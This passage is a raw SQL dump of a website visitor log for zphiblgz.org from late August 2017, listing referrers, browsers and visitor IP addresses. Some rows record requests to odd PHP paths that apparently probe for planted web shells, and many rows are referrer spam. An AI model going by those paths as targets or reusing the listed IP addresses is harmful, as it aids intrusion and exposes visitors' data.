org','Chrome','Android','45.0.2454.94','','158.69.27.211','000',1,0),(9779,'2017-08-27','http://zphiblgz.org','Firefox','Windows','40.1','','86.87.233.149','000',2,0),(9780,'2017-08-27','http://zphiblgz.org','curl','Unknown','7.38.0','','195.22.126.98','000',1,0),(9781,'2017-08-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.116.12','000',2,0),(9782,'2017-08-27','http://smsactivator.ru/','Opera','Windows','8.00','','188.163.79.53','000',1,0),(9783,'2017-08-27','http://zphiblgz.org','Firefox','Windows','40.1','','36.85.72.92','000',1,0),(9784,'2017-08-27','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.148','000',1,0),(9785,'2017-08-27','https://esopini.com/','MSIE','Windows','6.0','','46.118.118.100','000',2,0),(9786,'2017-08-27','http://zphiblgz.org/','Chrome','Windows','58.0.3029.81','','2.93.180.135','000',1,0),(9787,'2017-08-27','http://kemerovo.zrus.org/','MSIE','Windows','6.0','','46.118.125.246','000',3,0),(9788,'2017-08-27','https://www.souvenirua.com/','MSIE','Unknown','6.0','','46.118.125.246','000',1,0),(9789,'2017-08-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.222.11','000',2,0),(9790,'2017-08-27','http://zphiblgz.org','Safari','iPhone','10.0','','69.143.34.19','000',1,0),(9791,'2017-08-27','http://zphiblgz.org','Firefox','Windows','40.1','','27.130.80.86','000',2,0),(9792,'2017-08-27','http://zphiblgz.org/','Firefox','Windows','52.0','','212.26.236.180','000',3,0),(9793,'2017-08-27','https://www.google.com/','Safari','iPhone','10.0','','71.179.107.171','000',2,0),(9794,'2017-08-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','146.185.177.103','000',2,0),(9795,'2017-08-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','155.4.230.97','000',1,0),(9796,'2017-08-27','http://zphiblgz.org/','Firefox','Windows','7.0.1','','71.46.220.68','000',1,0),(9797,'2017-08-27','http://dvervmoskvu.ru/','Unknown','Unknown','Unknown','','46.118.154.36','000',1,0),(9798,'2017-08-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.165.230.5','000',2,0),(9799,'2017-08-27','http://mebel-vstroika.ru/','Opera','Windows','7.54','','178.137.4.41','000',3,0),(9800,'2017-08-27','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(9801,'2017-08-27','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',2,0),(9802,'2017-08-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.168','000',2,0),(9803,'2017-08-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',2,0),(9804,'2017-08-27','http://video-chat.love/','Opera','Windows','8.00','','46.118.118.100','000',3,0),(9805,'2017-08-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.67.180','000',2,0),(9806,'2017-08-27','http://www.ens-pbs1914.com/links/','Safari','iPhone','10.0','','166.137.240.87','000',1,0),(9807,'2017-08-27','http://zphiblgz.org/inde.php','MSIE','Windows','6.0','','37.57.25.225','000',1,0),(9808,'2017-08-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.174.93.133','000',2,0),(9809,'2017-08-27','http://zphiblgz.org','Firefox','Windows','40.1','','99.241.93.99','000',1,0),(9810,'2017-08-27','http://zphiblgz.org','Safari','iPhone','10.0','','73.191.115.122','000',1,0),(9811,'2017-08-27','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','208.86.198.196','000',1,0),(9812,'2017-08-27','https://via-energy-order.com/','Opera','Windows','9.0','','46.118.154.36','000',2,0),(9813,'2017-08-27','https://mmostrike.ru/','MSIE','Unknown','7.0b','','134.249.80.194','000',3,0),(9814,'2017-08-27','http://zphiblgz.org','Firefox','Windows','40.1','','79.97.33.214','000',2,0),(9815,'2017-08-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.170.156','000',2,0),(9816,'2017-08-27','http://zphiblgz.org','Firefox','Windows','40.1','','49.146.237.250','000',2,0),(9817,'2017-08-28','http://zphiblgz.org','Firefox','Linux','3.6.4','','46.105.100.183','000',41,0),(9818,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.182.19.15','000',2,0),(9819,'2017-08-28','http://technika-remont.ru/','Unknown','Unknown','Unknown','','46.118.125.246','000',3,0),(9820,'2017-08-28','http://zphiblgz.org/wp-includes/requests/utility/.path.php','Chrome','Windows','5.0.375.99','','168.243.204.60','000',2,0),(9821,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.168','000',2,0),(9822,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.115.87','000',2,0),(9823,'2017-08-28','http://zphiblgz.org/wp-includes/requests/utility/.path.php','Chrome','Windows','5.0.375.99','','216.16.121.69','000',1,0),(9824,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.223.200','000',2,0),(9825,'2017-08-28','http://zphiblgz.org','MSIE','Windows','6.0','','78.155.205.42','000',1,0),(9826,'2017-08-28','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.63.166','000',1,0),(9827,'2017-08-28','http://zphiblgz.org','MSIE','Windows','6.0','','109.248.250.155','000',1,0),(9828,'2017-08-28','http://www.shoppingmiracles.co.uk/','MSIE','Windows','6.0','','46.118.118.100','000',5,0),(9829,'2017-08-28','http://zphiblgz.org','MSIE','Windows','6.0','','78.178.168.104','000',1,0),(9830,'2017-08-28','http://zphiblgz.org','MSIE','Windows','6.0','','62.249.146.188','000',1,0),(9831,'2017-08-28','https://bioscorp.ru/','Opera','Windows','7.60','','46.118.154.36','000',2,0),(9832,'2017-08-28','http://taraz.xkaz.org/','MSIE','Windows','4.01','','46.118.154.36','000',3,0),(9833,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.173.74','000',2,0),(9834,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.201.133.100','000',1,0),(9835,'2017-08-28','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.163.1.11','000',1,0),(9836,'2017-08-28','http://komp-pomosch.ru/','Opera','Windows','8.00','','188.163.79.53','000',1,0),(9837,'2017-08-28','http://zphiblgz.org','Firefox','Windows','40.1','','178.135.80.70','000',2,0),(9838,'2017-08-28','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.62','000',1,0),(9839,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.101.137','000',2,0),(9840,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.57.79','000',2,0),(9841,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','128.52.128.105','000',2,0),(9842,'2017-08-28','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.51','000',1,0),(9843,'2017-08-28','zphiblgz.org','Chrome','Windows','50.0.2661.75','','37.187.88.203','000',1,0),(9844,'2017-08-28','http://zphiblgz.org','Firefox','Windows','3.0.7','','173.239.223.8','000',1,0),(9845,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',2,0),(9846,'2017-08-28','http://zphiblgz.org','G-i-g-a-b-o-t','Unknown','Unknown','','65.132.59.34','000',2,0),(9847,'2017-08-28','http://www.zphibmaryland.org/chapters/','Chrome','Windows','60.0.3112.101','','150.148.14.132','000',2,0),(9848,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.73.74','000',2,0),(9849,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.88','000',1,0),(9850,'2017-08-28','http://zphiblgz.org/','Firefox','Windows','7.0.1','','176.10.104.240','000',1,0),(9851,'2017-08-28','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.69','000',2,0),(9852,'2017-08-28','http://zphiblgz.org/','Edge','Windows','15.15063','','163.172.4.153','000',1,0),(9853,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','154.16.149.35','000',1,0),(9854,'2017-08-28','http://zphiblgz.org','Firefox','Windows','40.1','','212.187.47.3','000',2,0),(9855,'2017-08-28','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.22.126.98','000',1,0),(9856,'2017-08-28','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',2,0),(9857,'2017-08-28','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(9858,'2017-08-28','https://2000k.ru/','Opera','Windows','8.00','','178.137.4.41','000',1,0),(9859,'2017-08-28','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.148','000',1,0),(9860,'2017-08-28','http://zphiblgz.org','Firefox','Windows','50.0','','165.225.128.112','000',8,0),(9861,'2017-08-28','http://zphiblgz.org','Firefox','Windows','40.1','','1.123.148.193','000',2,0),(9862,'2017-08-28','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.57','000',1,0),(9863,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.165','000',2,0),(9864,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.223.82.156','000',2,0),(9865,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.63.161.0','000',2,0),(9866,'2017-08-28','http://zphiblgz.org/wp-content/uploads/index.php?php4','MSIE','Windows','6.0','','46.118.131.236','000',1,0),(9867,'2017-08-28','http://zphiblgz.org/wp-admin/includes/index.php?php4','MSIE','Windows','6.0','','78.168.51.20','000',1,0),(9868,'2017-08-28','http://zphiblgz.org/wp-includes/Text/Tiff.php?php','MSIE','Windows','6.0','','77.46.204.142','000',1,0),(9869,'2017-08-28','http://zphiblgz.org/wp-content/uploads/index.php?php','MSIE','Windows','6.0','','188.0.189.172','000',1,0),(9870,'2017-08-28','http://zphiblgz.org/wp-admin/includes/index.php?wphp4','MSIE','Windows','6.0','','178.121.118.140','000',1,0),(9871,'2017-08-28','http://zphiblgz.org/wp-admin/includes/images.php?wphp4','MSIE','Windows','6.0','','45.56.80.111','000',1,0),(9872,'2017-08-28','http://zphiblgz.org/wp-admin/includes/index.php?php','MSIE','Windows','6.0','','95.30.155.183','000',1,0),(9873,'2017-08-28','http://zphiblgz.org/wp-includes/Text/Tiff.php?php4','MSIE','Windows','6.0','','23.92.22.19','000',1,0),(9874,'2017-08-28','http://zphiblgz.org/wp-includes/Text/Tiff.php?wphp4','MSIE','Windows','6.0','','213.24.127.54','000',1,0),(9875,'2017-08-28','http://zphiblgz.org/wp-admin/includes/images.php?php','MSIE','Windows','6.0','','39.59.181.162','000',1,0),(9876,'2017-08-28','http://zphiblgz.org/wp-content/uploads/index.php?wphp4','MSIE','Windows','6.0','','39.113.211.55','000',1,0),(9877,'2017-08-28','http://zphiblgz.org/wp-admin/includes/images.php?php4','MSIE','Windows','6.0','','138.36.230.148','000',1,0),(9878,'2017-08-28','https://minharevisao.com/','Unknown','Unknown','Unknown','','188.163.79.53','000',1,0),(9879,'2017-08-28','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.42.140','000',2,0),(9880,'2017-08-28','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.42.76','000',1,0),(9881,'2017-08-28','http://zphiblgz.org','Firefox','Windows','40.1','','200.141.236.225','000',2,0),(9882,'2017-08-28','http://zphiblgz.org','Chrome','Windows','60.0.3112.113','','198.51.197.174','000',3,0),(9883,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.42.116.16','000',2,0),(9884,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',2,0),(9885,'2017-08-28','http://zphiblgz.org','Firefox','Windows','40.1','','73.107.171.172','000',2,0),(9886,'2017-08-28','https://kursy-ege.ru/','Opera','Windows','9.01','','188.163.79.53','000',3,0),(9887,'2017-08-28','http://zphiblgz.org','MSIE','Windows','11.0','','34.209.182.200','000',2,0),(9888,'2017-08-28','http://zphiblgz.org','Chrome','Windows','40.0.2221.51','','192.210.228.156','000',2,0),(9889,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.223.123.98','000',1,0),(9890,'2017-08-28','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.170.42.18','000',1,0),(9891,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.240.34','000',2,0),(9892,'2017-08-28','http://zphiblgz.org','Chrome','Windows','51.0.2704.103','','213.129.108.179','000',1,0),(9893,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.205','000',2,0),(9894,'2017-08-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','213.61.149.100','000',2,0),(9895,'2017-08-28','http://www.vizitki.net/','Opera','Windows','7.11','','46.118.118.100','000',2,0),(9896,'2017-08-28','http://zphiblgz.org/wp-includes/pomo/.dbmsc.php','Chrome','Windows','5.0.375.99','','89.184.75.203','000',1,0),(9897,'2017-08-28','http://irkutsk.zrus.org/','MSIE','Windows','6.0','','46.118.125.246','000',3,0),(9898,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.21.66.6','000',3,0),(9899,'2017-08-29','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.170.42.18','000',1,0),(9900,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.131','000',1,0),(9901,'2017-08-29','http://zphiblgz.org/','Firefox','Windows','7.0.1','','85.248.227.165','000',1,0),(9902,'2017-08-29','http://03e.info/','Opera','Windows','8.00','','46.118.125.246','000',2,0),(9903,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.87.82','000',1,0),(9904,'2017-08-29','http://zphiblgz.org/','Firefox','Windows','7.0.1','','37.187.129.166','000',1,0),(9905,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',5,0),(9906,'2017-08-29','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.67.180','000',1,0),(9907,'2017-08-29','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','192.40.95.34','000',11,0),(9908,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','45.62.236.66','000',1,0),(9909,'2017-08-29','http://pochtovyi-index.ru/','MSIE','Windows','6.0','','46.118.125.246','000',1,0),(9910,'2017-08-29','http://podshipniki-nsk.ru/','Opera','Windows','9.00','','178.137.4.41','000',1,0),(9911,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.171.163','000',1,0),(9912,'2017-08-29','https://moetomnenie.com/','MSIE','Windows','6.0','','188.163.79.53','000',1,0),(9913,'2017-08-29','http://zphiblgz.org','MSIE','Windows','6.0','','46.246.25.85','000',1,0),(9914,'2017-08-29','http://zphiblgz.org','Firefox','Windows','40.1','','108.81.162.146','000',2,0),(9915,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','130.226.169.137','000',4,0),(9916,'2017-08-29','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.148','000',1,0),(9917,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.169','000',2,0),(9918,'2017-08-29','http://zphiblgz.org','Firefox','Windows','40.1','','88.231.4.187','000',2,0),(9919,'2017-08-29','http://chatroulette.video/','MSIE','Windows','6.0','','46.118.118.100','000',1,0),(9920,'2017-08-29','http://zphiblgz.org','python-requests','Unknown','2.18.4','','203.74.125.135','000',4,0),(9921,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.219.237.229','000',2,0),(9922,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.201.225.45','000',2,0),(9923,'2017-08-29','http://zphiblgz.org','Firefox','Windows','40.1','','2.220.225.160','000',2,0),(9924,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.222.11','000',1,0),(9925,'2017-08-29','http://zphiblgz.org/','Firefox','Windows','7.0.1','','192.160.102.170','000',1,0),(9926,'2017-08-29','http://zphiblgz.org','Firefox','Windows','40.1','','195.3.158.178','000',2,0),(9927,'2017-08-29','http://zphiblgz.org','Android Browser','Android','4.0','','104.197.2.55','000',102,0),(9928,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.170.194','000',2,0),(9929,'2017-08-29','http://zphiblgz.org','Firefox','Windows','40.1','','76.69.242.20','000',2,0),(9930,'2017-08-29','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1528.IEmwnlT7RIdRQV6aFL_Bw809StHifhS5N7URzlgyEN-OEygQ2c99S7BuzgIsYyz0.2377ae69b731ec80928e91653c8422b6f6775754&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YG-XUIUpxKrkaoPisARVvB8&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSjd1dDR6UkJUVlBmcTBaVFNGR1lFaFczS214aVZBWkhvZXNyQ1Q4bndsNE1sRThYdlh5TG1B&b64e=2&sign=95bc10247226221616afda9e7a0cf95f&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96FLleor0gxkwRb_gwg9vn0sTNuhO3pnStu5m8JSdIBaGHoIYAo11Kdj-qxH4pqiu5AXeHnX8SNnYOMtfZ1hzw-Aq6fcu8IThXe5zbSP4rxLun-GttaS4miXKryyKOHffuf&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUeNiDU-Ul0A23h3F5apg8TY9ZQVMHuOyxF07uaXRuf06a2P--hQs1td_7yVL4PE3Zu9ZDkF8STjg&l10n=ru&cts=1504016761180&mc=6.60638146058','Firefox','Windows','53.0','','188.255.16.224','000',1,0),(9931,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.34.210','000',2,0),(9932,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.142.242.84','000',2,0),(9933,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','164.132.106.162','000',1,0),(9934,'2017-08-29','http://zphiblgz.org','Firefox','Windows','40.1','','47.30.152.172','000',2,0),(9935,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.234.107.134','000',2,0),(9936,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.161.119','000',2,0),(9937,'2017-08-29','http://zphiblgz.org','Firefox','Linux','49.0','','138.197.111.174','000',1,0),(9938,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','204.8.156.142','000',2,0),(9939,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.219.237.244','000',2,0),(9940,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.165','000',2,0),(9941,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.169.135.133','000',2,0),(9942,'2017-08-29','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(9943,'2017-08-29','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',3,0),(9944,'2017-08-29','http://zphiblgz.org/','Firefox','Windows','7.0.1','','65.19.167.132','000',1,0),(9945,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.215','000',3,0),(9946,'2017-08-29','http://zphiblgz.org','Firefox','Windows','40.1','','101.180.252.27','000',2,0),(9947,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.163','000',2,0),(9948,'2017-08-29','http://zphiblgz.org','Firefox','Windows','40.1','','93.119.135.102','000',2,0),(9949,'2017-08-29','http://zphiblgz.org','MSIE','Windows','6.0','','185.135.80.139','000',1,0),(9950,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.139.8.104','000',2,0),(9951,'2017-08-29','http://zphiblgz.org','Firefox','Windows','40.1','','85.170.0.206','000',2,0),(9952,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.206.225.183','000',2,0),(9953,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.164','000',2,0),(9954,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',1,0),(9955,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.101.139.248','000',2,0),(9956,'2017-08-29','http://zphiblgz.org','Firefox','Windows','40.1','','106.244.224.173','000',2,0),(9957,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','204.85.191.30','000',1,0),(9958,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.182.18.40','000',2,0),(9959,'2017-08-29','http://zphiblgz.org','Firefox','Windows','53.0','','54.200.193.19','000',2,0),(9960,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.174.93.133','000',2,0),(9961,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.165','000',2,0),(9962,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.41.8','000',3,0),(9963,'2017-08-29','http://zphiblgz.org','python-requests','Unknown','2.18.3','','220.136.19.54','000',2,0),(9964,'2017-08-29','http://zphiblgz.org','Firefox','Windows','40.1','','177.148.141.130','000',2,0),(9965,'2017-08-29','http://zphiblgz.org','Firefox','Windows','29.0','','138.197.11.210','000',1,0),(9966,'2017-08-29','http://zphiblgz.org','Chrome','Macintosh','35.0.1916.114','','138.197.11.210','000',1,0),(9967,'2017-08-29','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','138.197.11.210','000',1,0),(9968,'2017-08-29','http://zphiblgz.org','MSIE','Windows','10.0','','138.197.11.210','000',1,0),(9969,'2017-08-29','http://zphiblgz.org','MSIE','Windows','9.0','','138.197.11.210','000',1,0),(9970,'2017-08-29','http://zphiblgz.org','Firefox','Macintosh','29.0','','138.197.11.210','000',1,0),(9971,'2017-08-29','http://zphiblgz.org','Chrome','Macintosh','34.0.1847.131','','138.197.11.210','000',3,0),(9972,'2017-08-29','https://www.google.com/','Chrome','Windows','60.0.3112.113','','96.244.217.249','000',1,0),(9973,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.134.12','000',1,0),(9974,'2017-08-29','http://zphiblgz.org','Firefox','Linux','49.0','','138.197.111.21','000',1,0),(9975,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.43.232','000',1,0),(9976,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.171.40','000',2,0),(9977,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.234.157.254','000',1,0),(9978,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.56.223.241','000',2,0),(9979,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','173.255.226.142','000',2,0),(9980,'2017-08-29','https://www.google.com/','Safari','iPhone','10.0','','99.127.166.159','000',2,0),(9981,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','173.208.153.75','000',2,0),(9982,'2017-08-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.63.98','000',1,0),(9983,'2017-08-29','http://zphiblgz.org/','Firefox','Windows','7.0.1','','79.137.67.116','000',1,0),(9984,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','66.70.217.179','000',2,0),(9985,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','82.211.19.143','000',2,0),(9986,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.187.129.166','000',1,0),(9987,'2017-08-30','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','192.40.95.34','000',3,0),(9988,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','128.52.128.105','000',1,0),(9989,'2017-08-30','http://zphiblgz.org/','Firefox','Windows','7.0.1','','176.126.252.11','000',1,0),(9990,'2017-08-30','https://pl-top.pl/','MSIE','Windows','6.0','','188.163.72.15','000',8,0),(9991,'2017-08-30','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1529.drl89_lfUoykI3W30Jxhm-f7a6yIFnQZBZy0ORxeVzJ0xwe--B-H5bsAxgLh1l9g.539d21ad77150cb9f03d9c8b59598262e053e076&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMIVJNtoWDTa6Ctl47TPu5I&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSjd1dDR6UkJUVlBkaFRLeGQ1Y0ZPTWZGVjFQV296bmMwdHo2MENSTVlNWFhCLUpaQ1pmdXJl&b64e=2&sign=a16f47d451f61e1936bb21aaa71bdf65&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQULnoVAFacUfQhnm6LQn3nFKLlzJ-TciGrEVqeYaXlbNx3GWVlRklZ99nep_qw8de4ifWHOskYCqDKOYveld6AIYkRE7wWiEprD1Hz8uxyZ9SuKe9i2xUGwlc14cSMwFEd41uXW5QTMU&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWQWxj6qvocP3Ji8NIYOFgDwF1mZjZiOZJRyS7x7u8_GN5RXGPMI9tlRXIZxAjiYRwiTuFt-Iq2Tg&l10n=ru&cts=1504077313231&mc=5.79661282721','Firefox','Windows','53.0','','46.188.90.210','000',1,0),(9992,'2017-08-30','http://www.vizitki.net/','MSIE','Windows','6.0','','178.137.165.219','000',6,0),(9993,'2017-08-30','http://zphiblgz.org','python-requests','Unknown','2.18.4','','203.74.125.135','000',4,0),(9994,'2017-08-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.255.75','000',1,0),(9995,'2017-08-30','http://cool-wedding.net/','MSIE','Windows','6.0','','46.118.158.19','000',3,0),(9996,'2017-08-30','http://zphiblgz.org','Firefox','Windows','40.1','','109.222.161.1','000',2,0),(9997,'2017-08-30','https://letsart.ru/','MSIE','Windows','6.0','','178.137.4.41','000',3,0),(9998,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.161.119','000',2,0),(9999,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.206','000',1,0),(10000,'2017-08-30','http://zphiblgz.org/','Firefox','Windows','7.0.1','','62.210.105.116','000',1,0),(10001,'2017-08-30','http://zphiblgz.org','Android Browser','Android','4.0','','62.210.152.119','000',103,0),(10002,'2017-08-30','http://zphiblgz.org','MSIE','Windows','11.0','','198.204.230.130','000',1,0),(10003,'2017-08-30','http://zphiblgz.org','Firefox','Windows','40.1','','126.209.204.249','000',2,0),(10004,'2017-08-30','ZPHIBLGZ.ORG/components/com_contact/en-gb.php','MSIE','Windows','6.0','','94.185.84.146','000',1,0),(10005,'2017-08-30','http://zphiblgz.org','Firefox','Windows','1.0.7','','34.229.165.167','000',2,0),(10006,'2017-08-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.60','000',1,0),(10007,'2017-08-30','https://schock-store.ru/','MSIE','Windows','6.0','','46.118.113.254','000',2,0),(10008,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.163','000',2,0),(10009,'2017-08-30','http://zphiblgz.org','Chrome','Windows','60.0.3112.113','','208.76.113.4','000',1,0),(10010,'2017-08-30','http://zphiblgz.org','Firefox','Windows','40.1','','188.250.27.173','000',2,0),(10011,'2017-08-30','http://zphiblgz.org/fascina/popup-pomo.php','Chrome','Windows','5.0.375.99','','93.95.100.110','000',2,0),(10012,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.76.81','000',2,0),(10013,'2017-08-30','http://zphiblgz.org','Chrome','Windows','51.0.2704.103','','185.85.191.201','000',2,0),(10014,'2017-08-30','http://zphiblgz.org','Firefox','Windows','40.1','','103.229.123.241','000',1,0),(10015,'2017-08-30','http://zphiblgz.org','Firefox','Windows','40.1','','94.240.243.117','000',1,0),(10016,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.201','000',2,0),(10017,'2017-08-30','https://www.google.com/','Chrome','Windows','58.0.3029.110','','128.220.159.33','000',1,0),(10018,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.219.237.244','000',1,0),(10019,'2017-08-30','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.42.76','000',1,0),(10020,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.42.18','000',4,0),(10021,'2017-08-30','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','54.229.180.102','000',1,0),(10022,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','18.85.22.204','000',2,0),(10023,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','188.116.11.181','000',2,0),(10024,'2017-08-30','http://zphiblgz.org','Firefox','Windows','40.1','','41.101.104.62','000',2,0),(10025,'2017-08-30','http://zphiblgz.org/pressthisa/popup-pomo.php','Chrome','Windows','5.0.375.99','','89.184.75.203','000',2,0),(10026,'2017-08-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',2,0),(10027,'2017-08-30','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',2,0),(10028,'2017-08-30','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(10029,'2017-08-30','http://www.zphibmaryland.org/chapters/','Chrome','Windows','60.0.3112.113','','170.115.248.25','000',3,0